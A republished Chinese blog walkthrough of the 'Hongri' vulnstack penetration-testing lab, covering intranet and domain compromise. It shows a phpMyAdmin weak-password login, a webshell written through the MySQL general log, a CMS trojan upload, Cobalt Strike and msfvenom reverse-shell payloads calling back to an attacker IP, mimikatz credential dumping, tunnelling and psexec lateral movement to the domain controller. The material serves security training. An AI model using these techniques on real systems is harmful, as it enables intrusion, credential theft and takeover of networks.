iis服务器助手广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >红日靶场(一)
  • 392
分享到

红日靶场(一)

php数据库开发语言 2023-10-21 07:10:53 392人浏览 安东尼
摘要

红一 环境搭建 1. 实验环境拓扑如下: 2. 下载好镜像文件,下载地址: Http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G,需要百度网盘会员) 3. 需要模拟内网和外网两个

红一

  • 环境搭建

1. 实验环境拓扑如下:

2. 下载好镜像文件,下载地址: Http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G,需要百度网盘会员)

3. 需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供WEB服务,一个是通向内网。添加网络设配器如下图

将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)

而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。

网络配置完成,这三台虚拟主机默认开机密码都是 hongrisec@2019(开机提示密码已过期,更改为 123qwe.即可)登录查看三台虚拟机的ip地址如下:

windows7:(内:192.168.52.143 / 外:192.168.44.134(外网根据你的物理机进行分配))

windows2003:(内:192.168.52.141)

windows2008:(内:192.168.52.138)

开机之后更新一下Vmware TOOls

更新之前

更新之后

最后在 Win7 外网服务器主机的 C 盘找到 PHPStudy 启动 Web 服务

靶场的环境搭建完毕

二.Web渗透

1.信息收集

(1)我们使用nmap进行扫描 nmap -T4 -A 192.168.44.134(nmap的使用-A:全面扫描 -T4: 快速扫描)

扫描工具很多,能不能扫出有用信息还是看字典是否强大,可以看到目标80端口开启,3306端口开放

(2)我们访问http://192.168.44.134/phpmyadmin,可以看到数据库管理后台

我们猜测用户名和密码是root root,可以看到登录成功

(3)我们尝试into outfile写入木马进行getshell,想在网站内部写入木马,需要知道网站的绝对路径,可以通过报错获取路径,用select @@basedir;查询,通过查询phpinfo.php等等多种方法,这里我们使用select @@basedir;进行查询。

(4)然后通过执行select ‘’into outfile ‘C:/phpStudy/www/webshell.php’;(注意这里的符号都是英文状态,不然会报错)将木马写入到网站的根目录

我们可以看到写入失败,通过查询得知这里不能使用into outfile的方式写入shell,可以通过执行“show variables like ‘%secure_file%’;”查询下是否能直接写入shell。这里secure_file_priv的值为NULL,说明不能使用into outfile的方式写入shell。

(5) 尝试日志写入shell

查看日志状态:show variables like ‘%general%’,我们可以看到是关闭的

这里我们说一下general_log和general_log_file:

Mysql打开general_log开关之后,所有对数据库的操作都将记录在general_log_file指定的文件目录中,以原始的状态来显示,如果将general_log开关打开,general_log_file指定一个php文件,则查询的操作将会全部写入到general_log_file指定的文件,可以通过访问general_log_file指定的文件来获取webshell。

开启日志记录:set global general_log = “ON”;再查询日志状态,是开启的

(6)执行命令:set global general_log_file=‘C:/phpStudy/www/web.php’,指定日志写入到网站根目录的 web.php 文件.

访问日志文件

(7)我们连接蚁剑(使用蚁剑的时候,记得关闭杀毒软件),密码是pass,我们可以看到连接成功

2. WEB后台上传GetShell

(1)在我们目录扫描中,还扫到了我们的网站备份源码

(2) 我们搭建yxcms 系统,浏览器访问http://192.168.44.134/yxcms/

我们根据提示成功进入网站后台

(3) 可以新建一个木马文件,前台模块-管理模块文档-新建

我们可以看到文件已上传,可通过前面下载的beifen.rar文件来查找acomment.php文件来确定文件上传的路径:

(4) 蚁剑成功连接

(5) 留言板处存在xss漏洞:

三. 内网信息收集

1. 使用CS植入Backdoor

(1)我们在kali或者Windows里面安装CS,我们在kali里面启动CS,我们需要开2个终端

(2) 先新建监听,主机IP填写kali的ip

(3)我们生成后门

(4)生成后,使用蚁剑进行上传到靶机

(5) 上传后使用蚁剑中使用终端命令行执行start web.exe, 可以看到我们 CS 客户端靶机上线

(6) 我们进行提权到 SYSTEM 系统权限账户。

2.信息收集

(1) 由于受害机默认60秒进行一次回传,为了实验效果我们这里把时间设置成5,但实际中频率不宜过快,容易被发现。

(2) 开始简单进行信息收集,常用到的有以下

ipconfig /all   查看本机ip,所在域

route print     打印路由信息

net view        查看局域网内其他主机名

arp -a          查看arp缓存

whoami

net start       查看开启了哪些服务

net share       查看开启了哪些共享

net share ipc$  开启ipc共享

net share c$    开启c盘共享

net use \\192.168.xx.xx\ipc$ "" /user:""   与192.168.xx.xx建立空连接

net use \\192.168.xx.xx\c$ "密码" /user:"用户名"  建立c盘共享

dir \\192.168.xx.xx\c$\user    查看192.168.xx.xx c盘user目录下的文件

net config Workstation   查看计算机名、全名、用户名、系统版本、工作站、域、登录域

net user                 查看本机用户列表

net user /domain         查看域用户

net localgroup administrators   查看本地管理员组(通常会有域用户)

net view /domain         查看有几个域

net user 用户名 /domain   获取指定域用户的信息

net group /domain        查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)

net group 组名 /domain    查看域中某工作组

net group "domain admins" /domain  查看域管理员的名字

net group "domain computers" /domain  查看域中的其他主机名

net group "doamin controllers" /domain  查看域控制器(可能有多台)

(3) 使用ipconfig /all 判断是否存在域, 可以看到存在Gob.org域

也可以执行命令net config Workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息

(4) 获取域内用户的详细信息:wmic useraccount get /all

(5) 查看是否存在杀毒进程:tasklist

除了使用CS外,我们也可以使用msf进入操作。

3.msf

(1)使用msf生成shell.exe

(2) 将shell.exe使用蚁剑上传到web服务器中。msf开启监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.44.130

set lport 6666

exploit

我们可以看到没有反弹成功,我们换一个端口4444

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.44.130 LPORT=4444 -f exe -o door.exe

(3) 运行door.exe,msf成功反弹shell

(4) msf中getsystem也可直接提权

(5)MSF使用_MSF中kiwi(mimikatz)模块的使用

1) 首先:提权到system权限:

一是当前的权限是administrator用户;

二是利用其它手段先提权到administrator用户。然后administrator用户可以直接在meterpreter_shell中使用命令getsystem提权到system权限。

2)进程迁移

kiwi模块同时支持32位和64位的系统,但是该模块默认是加载32位的系统,所以如果目标主机是64位系统的话,直接默认加载该模块会导致很多功能无法使用。

所以如果目标系统是64位的,则必须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载kiwi并且查看系统明文。如果目标系统是32位的,则没有这个限制。

查看进程信息:ps

把进程迁移到PID为504这个程序中(因为当前用户):

注:因为目标系统是64位的所以需要把meterpreter进程迁移到一个64位程序的进程中。

load kiwi #加载kiwi模块

help kiwi #查看kiwi模块的使用

creds_all:             #列举所有凭据

creds_kerberos:        #列举所有kerberos凭据

creds_msv:             #列举所有msv凭据

creds_ssp:             #列举所有ssp凭据

creds_tspkg:           #列举所有tspkg凭据

creds_wdigest:         #列举所有wdigest凭据

dcsync:                #通过DCSync检索用户帐户信息

dcsync_ntlm:           #通过DCSync检索用户帐户NTLM散列、SID和RID

golden_ticket_create:  #创建黄金票据

kerberos_ticket_list:  #列举kerberos票据

kerberos_ticket_purge: #清除kerberos票据

kerberos_ticket_use:   #使用kerberos票据

kiwi_cmd:              #执行mimikatz的命令,后面接mimikatz.exe的命令

lsa_dump_sam:          #dump出lsa的SAM

lsa_dump_secrets:      #dump出lsa的密文

passWord_change:       #修改密码

wifi_list:             #列出当前用户的wifi配置文件

wifi_list_shared:      #列出共享wifi配置文件/编码

3)该命令可以列举系统中的明文密码: creds_all  #列举所有凭据

四. 内网横向渗透

 利用MSF横向渗透可以使用cs和MSF两种方式进行横向渗透。这里以CS作为演示。(2008,2003可以使用永恒之蓝进行)

1.第一步就是生成exe,然后拿到shell(上面已经讲过)

2.进行目标主机信息收集

3.横向探测

(1)获取到一个 cs 的 beacon 后可以目标内网情况和端口开放情况

在 beacon 上右键 -> 目标 -> 选择 net view 或者 port scan

(2). 执行后可以在 Targets 选项卡看到扫描出来的主机

(3). 用 cs 的 hashdump 读内存密码:hashdump,用 mimikatz 读注册表密码:logonpasswords

4.横向移动#

这里有很多种方式,可以:

1.)cs 上开通 socks 通道,在攻击机上用 proxychains 将攻击机的 msf 代入内网,但是 cs socks 代理不稳定

2.)ew 添加转接隧道,在攻击机上用 proxychains 将攻击机的 msf 代入内网

3.)cs 派生到 msfmsf 使用 socks4a 代理进内网,但是并不稳定

4.)cs 派生到 msfmsf 使用使用 autoroute 添加路由进内网

5.) frp 创建 socks5 代理

5.SMB Beacon

另外这里还要介绍下 cs 派生 SMB Beacon

SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时可能发挥奇效

简单来说,SMB Beacon 有两种方式

第一种直接派生一个孩子,目的为了进一步盗取内网主机的 hash

1)新建一个 Listener,payload 设置为 Beacon SMB:

2)选择后会反弹一个子会话,在 external 的 ip 后面会有一个链接的小图标:

这就是派生的 SMB Beacon,当前没有连接

可以在主 Beacon 上用 link host 连接它,或者 unlink host 断开它

第二种在已有的 beacon 上创建监听,用来作为跳板进行内网穿透

前提是能够通过 shell 之类访问到内网其他主机

6. psexec使用凭证登录其他主机

前面横向探测已经获取到内网内的其他 Targets 以及读取到的凭证信息

于是可以尝试使用 psexec 模块登录其他主机

1)右键选择一台非域控主机 ROOT-TVI862UBEH 的 psexec 模块

2)执行效果如下:

3) 这几条命令,执行后得到了 ROOT-TVI862UBEH 这台主机的 beacon

如法炮制得到了域控主机 OWA 的 beacon:

来源地址:https://blog.csdn.net/qq_58091216/article/details/130457897

--结束END--

本文标题: 红日靶场(一)

本文链接: https://www.lsjlt.com/news/433492.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • 红日靶场(一)
    红一 环境搭建 1. 实验环境拓扑如下: 2. 下载好镜像文件,下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G,需要百度网盘会员) 3. 需要模拟内网和外网两个...
    99+
    2023-10-21
    php 数据库 开发语言
  • 内网域渗透总结(红日靶场一)
    一、靶场环境搭建 红日靶场:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/靶机通用密码:hongrisec@2019win7win2003win20...
    99+
    2023-08-31
    内网渗透 红日靶场(一)
  • 红日ATT&CK系列靶场(-)简记
    Step 1>》信息收集 nmap 发现80、 3306 nmap -T4 -O 192.168.92.100 访问80端口 dirsearch(御剑)扫描 发现:/phpMyadmin Step 2 》漏洞利用 弱口令 http:/...
    99+
    2023-09-01
    网络安全
  • Vulnstack靶场实战(一)
    搭建好靶场后 包括win7的web端,还有win2003为域成员,域控为win2008 win7内网ip:192.168.157.153 外网ip:192.168.52.143 域成员 win2003...
    99+
    2023-09-26
    php 安全 服务器
  • 搭建一个pikachu靶场
    今天我们来学习搭建一个pikachu的web靶场 首先我们来下载源代码 开源源代码链接:https://github.com/zhuifengshaonianhanlu/pikachu  然后我们来搭建靶场 我这里使用小皮面板进行快速搭建...
    99+
    2023-09-04
    apache php 开发语言 安全
  • DVWA靶场
    目录 靶场简介 搭建DVWA靶场 1.下载phpstaudy  2. 下载DVWA ​编辑 错误提示修改  PHP function display_startup_errors: disabled PHP function allow_u...
    99+
    2023-09-04
    网络安全
  • pikachu靶场打靶分析
    目录: 下载phpstudy_pro xss漏洞介绍       反射性xss(get)       存储型xss       dom型xss漏洞(在前端处理)       dom型xss-x漏洞 xss漏洞获取cook...
    99+
    2023-09-18
    php 开发语言 web安全 linux 安全性测试
  • AWD靶场场景复现
    AWD靶场场景复现 ** 00x1-万能密码 ** 第一步万能密码登入 ** 00x2-d盾扫描 ** ** 00x3-sql注入 ** 00x4-文件上传 1.上传失败 2.原因:无文件,连...
    99+
    2023-09-01
    php 安全 web安全
  • DVWA靶场搭建
    ** ** 搭建DVWA 靶场 1.环境搭建 phpstudy是一个能够提供php建站集成化服务的一款软件。如果我们要搭建一个Web服务,我们需要需要满足4个条件: 1.操作系统【windows,l...
    99+
    2023-09-20
    php apache java
  • Pikachu靶场全关详细教学(一)
    一、Pikachu靶场介绍 Pikachu靶场下载地址:https://github.com/zhuifengshaonianhanlu/pikachu ​ Pikachu是一个带有漏洞的Web应用系...
    99+
    2023-08-31
    安全 web安全 php
  • 【VulnHub靶场】Hackable: III
    Step 1 在找到目标靶机后,我们首先使用nmap工具来进行初步的信息收集 Command used: > Step 2 通过扫描我们可以得知80端口是开启状态,访问后得到以下界面 查看其源代码...
    99+
    2023-08-31
    安全 php 系统安全 web安全 网络安全
  • 搭建DVWA靶场
    搭建DVWA靶场 @Author by 白也白泽 一、DVWA简介:        DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴...
    99+
    2023-09-29
    linux 服务器 centos
  • 【VulnHub靶场】——MONEYBOX: 1
    作者名:Demo不是emo  主页面链接:主页传送门创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,中后期主要是经验和能力的提高,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程...
    99+
    2023-09-08
    服务器 网络安全 web安全 安全
  • sqli-labs靶场分析
    sqli-labs靶场分析 1、level1 单引号测试报错,为单引号闭合,且显示1多了个单引号故而为字符型注入。且未对用户输入进行任何过滤。 且SQL语句错误会输出,可以使用报错注入 orde...
    99+
    2023-10-06
    sql web安全 网络安全
  • Sql-labs靶场(1~28)
    文章目录 简介Less-1 '闭合Less-2 数字型无闭合字符Less-3 ')闭合Less-4 ")闭合Less-5报错注入 '闭合Less-6报错注入"闭合Less-7写马注入Less-...
    99+
    2023-09-18
    sql 数据库 mysql 网络安全
  • sqli-laba靶场搭建
    目录 windows下搭建sqli-laba 安装phpstudy 下载sqli-laba 部署sqli-laba linux搭建sqli-labs(docker搭建) 搭建sqli-laba windows下搭建sqli-laba 环...
    99+
    2023-09-05
    php 数据库 mysql
  • vulnhub靶场之Black-Widow-final
    1.信息收集 探测存活主机,发现192.168.239.177存活 对目标主机192.168.239.177进行端口扫描,发现存活22、80、111、2049、3128等端口 在浏览器中访问htt...
    99+
    2023-09-08
    php apache 安全
  • VauditDemo靶场代码审计
    靶场搭建 将下载好的VAuditDemo_Debug目录复制到phpstudy的www目录下,然后将其文件名字修改成VAuditDemo,当然你也可以修改成其他的 运行phpstudy并且访问in...
    99+
    2023-09-06
    php 网络安全 web安全 网络攻击模型
  • XAMPP、phpstudy搭建DVWA靶场
    一、实验目的  1.用PHP开发环境集成工具XAMPP搭建DVWA靶场。 2.用PHP开发环境集成工具phpstudy搭建DVWA靶场。 二、实验原理 XAMPP 是一款跨平台的 PHP 开发环境工具,集成了Apache、MySQL、PHP...
    99+
    2023-09-16
    前端 数据库 php apache 网络安全
  • sqli-labs靶场(1-22关)
    目录 第一关: 第二关: 第三关: 第四关: 第五关(盲注): 第六关(盲注): 第七关(报错盲注): 第八关(时间盲注): 第九关(时间盲注): 第十关(时间盲注): 第十一关(报错):  第十二关: 第十三关: 第十四关: 第十五关(布...
    99+
    2023-09-24
    数据库 mysql sql
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作